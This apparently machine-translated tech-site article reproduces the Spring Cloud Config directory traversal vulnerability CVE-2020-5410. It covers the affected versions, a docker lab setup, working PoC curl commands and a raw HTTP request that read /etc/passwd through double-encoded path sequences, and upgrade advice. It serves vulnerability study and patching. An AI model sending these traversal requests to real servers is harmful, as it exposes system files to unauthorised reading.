In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-02-23 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
Spring Cloud Config directory traversal vulnerability CVE-2020-5410 recurrence of how, I believe that many inexperienced people are helpless about this, for this reason this article summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.
Spring Cloud Config Directory Crossing Vulnerability
(CVE-2020-5410)
I. Brief introduction of vulnerability
Spring Cloud Config, version 2.2.x before 2.2.3, version 2.1.x before 2.1.9, and older unsupported versions allow applications to supply arbitrary configuration files via the spring-cloud-config-server module. Malicious users or attackers can send requests using crafted URLs, which could lead to directory traversal attacks.
II. Impact version
Spring Cloud Config: 2.2.0 to 2.2.2
Spring Cloud Config: 2.1.0 to 2.1.8
III. Vulnerability Environment & Vulnerability Recurrence
PoC:
curl "vulnerablemachine:port/..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252Fetc%252Fpasswd%23foo/development"
curl "127.0.0.1:8888/..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252Fetc%252Fpasswd%23foo/development"
docker environment deployment:
docker pull hyness/spring-cloud-config-server:2.1.6.RELEASE
docker run -it --name=spring-cloud-config-server \
-p 8888:8888 \
hyness/spring-cloud-config-server:2.1.6.RELEASE \
--spring.cloud.config.server.git.uri=https://github.com/spring-cloud-samples/config-repo
Visit address: 192.168.0.110:8888/
Executive POC:
curl "192.168.0.110:8888/..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252Fetc%252Fpasswd%23foo/development"
Burp performs visits:
Detailed data package:
GET /..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252Fetc%252Fpasswd%23foo/development HTTP/1.1
Host: 192.168.0.110:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
System Execution Access Record:
IV. Suggestions for repair:
Upgrade to Spring Cloud Config to version 2.2.3 or 2.1.9 and place Spring-Cloud-Config-Server services on the intranet while using Spring Security for authentication. Download the latest version at github.com/spring-cloud/spring-cloud-config/releases
After reading the above content, do you know how to reproduce the Spring Cloud Config directory penetration vulnerability CVE-2020-5410? If you still want to learn more skills or want to know more related content, welcome to pay attention to the industry information channel, thank you for reading!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
